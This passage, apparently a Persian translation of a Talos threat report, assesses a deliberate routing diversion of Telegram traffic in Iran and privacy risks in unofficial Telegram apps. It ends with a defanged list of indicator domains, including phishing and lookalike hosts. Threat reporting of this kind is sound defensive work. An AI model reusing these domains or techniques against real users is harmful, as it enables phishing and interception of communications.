در حالی که برای تالوس غیرممکن است که نیتی که پشت به‌روز رسانی پیام‌ها در ۳۰ ژوئیه بود را تعیین کند، تالوس با اطمینان متوسطی ارزیابی می کند که به روز رسانی یک اقدام عمدی است که خدمات وابسته به تلگرام را در منطقه هدف قرار داده‌است. بعید به نظر می رسد که چهار پیام به روز رسانی در یک زمان مشابه ارسال شود تا دو محدوده تلگرام مختلف را از طریق چهار زیرشاخه مختلف مرتبط با  درگاه خودگردان ۵۸۲۲۴ منحرف کند. این ارزیابی همچنین گزارشات منتشرشده قبلی در رابطه با تاریخ پیچیده ایران را در رابطه با تلگرام از تصویب قوانین فیلترینگ تلگرام، تا گزارشات قطعی ناشی از فیلتر کردن آدرس‌های آی پی تلگرام در ایران را در نظر گرفته است.
جدا از قربانیان و برنامه های کاربردی، تالوس قادر به پیدا کردن ارتباط مشخصی بین این حوادث نبوده‌است. این تحقیق بخاطر فیلترینگ اخیر تلگرام روی ایران متمرکز بوده‌است. با این حال، این تکنیک ها می تواند توسط هر بازیگر مخرب مورد استفاده قرار گیرد، چه از حمایت دولتی برخوردار باشد یا نباشد. تالوس با اطمینان بالا ارزیابی می کند که حریم خصوصی کاربران هنگام استفاده از برنامه های مورد بحث در این گزارش در معرض خطر است. نگرانی های امنیتی کلی باید جدی گرفته شود.

دامنه‌ها

talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
andromedaa[.]ir
30dn[.]ir
ndrm[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
andromedaa[.]com
mobilecontinue[.]network
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn–oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

پاسخی بگذارید